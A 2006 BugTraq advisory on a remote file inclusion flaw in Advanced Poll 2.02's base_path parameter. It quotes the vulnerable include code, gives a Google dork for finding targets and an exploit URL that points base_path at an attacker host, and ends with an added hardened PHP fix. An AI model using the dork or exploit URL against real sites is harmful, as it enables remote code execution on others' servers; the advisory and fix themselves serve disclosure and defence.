BugTraq
SolpotCrew Advisory #2 - Advanced Poll ver 2.02 (base_path) Remote File Inclusion Jul 21 2006 08:36AM
chris_hasibuan yahoo com
#############################SolpotCrew Community################################
#
# Advanced Poll ver 2.02 (base_path) Remote File Inclusion
#
# Vendor site : http://www.proxy2.de/scripts.php
#
#################################################################################
#
# Bug Found By : Solpot a.k.a (k. Hasibuan)
#
# contact: chris_hasibuan (at) yahoo (dot) com
#
# Website : http://www.solpotcrew.org/adv/solpot-adv-02.txt
#
#################################################################################
#
# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,
# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy
# home_edition2001 , Rendy ,Tje , m3lky , no-profile
# and all crew #mardongan @ irc.dal.net
#
#################################################################################
Input passed to the "base_path" parameter is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Code from /admin/common.inc.php:

    $pollvars['SELF'] = basename($PHP_SELF);
    // $base_path is used in the include path without being verified
    if (file_exists("$base_path/lang/$pollvars[lang]")) {
        include ("$base_path/lang/$pollvars[lang]");
    } else {
        include ("$base_path/lang/english.php");
    }

google dork : inurl:comments.php?action= send id

EXPLOIT :

http://somehost/[path_advanced_poll]/admin/common.inc.php?base_path=http://atacker

##############################MY LOVE JUST FOR U RIE#########################

######################################E.O.F##################################
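
A hardened form of the include logic quoted from /admin/common.inc.php, added here as an example and not taken from the advisory or from Advanced Poll: the base directory is fixed by the script's own location instead of a request-settable $base_path, and the language name is limited to a bare file name that resolves inside lang/. The helper name poll_resolve_lang_file, the directory layout and the sample inputs are assumptions.

```php
<?php
// Added example, not Advanced Poll code. Requires PHP 7+.
// poll_resolve_lang_file() is a hypothetical helper name.

function poll_resolve_lang_file(string $langDir, string $requested): string
{
    $fallback = $langDir . DIRECTORY_SEPARATOR . 'english.php';

    // Accept only a bare file name such as "german.php": no slashes,
    // no URL scheme, no "..", no NUL byte.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\.php\z/i', $requested)) {
        return $fallback;
    }

    // realpath() resolves symlinks and returns false for missing files,
    // so the prefix test below is made against the real location.
    $root = realpath($langDir);
    $candidate = realpath($langDir . DIRECTORY_SEPARATOR . $requested);
    if ($root === false || $candidate === false || !is_file($candidate)
        || strpos($candidate, $root . DIRECTORY_SEPARATOR) !== 0) {
        return $fallback;
    }
    return $candidate;
}

// In common.inc.php the base directory would come from the script's own
// location instead of a request-settable variable, for example:
//   $base_path = dirname(__DIR__);   // assumes lang/ sits beside admin/
//   include poll_resolve_lang_file("$base_path/lang", (string) $pollvars['lang']);

// Constructed demo: a temporary lang/ directory and sample inputs.
$langDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'poll_lang_' . getmypid();
mkdir($langDir);
foreach (['english.php', 'german.php'] as $f) {
    file_put_contents($langDir . DIRECTORY_SEPARATOR . $f, "<?php // $f\n");
}
$samples = ['german.php', 'missing.php', '../admin/x.php', 'http://example.invalid/x.php'];
foreach ($samples as $s) {
    printf("%-30s => %s\n", $s, basename(poll_resolve_lang_file($langDir, $s)));
}
array_map('unlink', glob($langDir . DIRECTORY_SEPARATOR . '*'));
rmdir($langDir);
```

Only the first sample resolves to its own file; the other three fall back to english.php.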
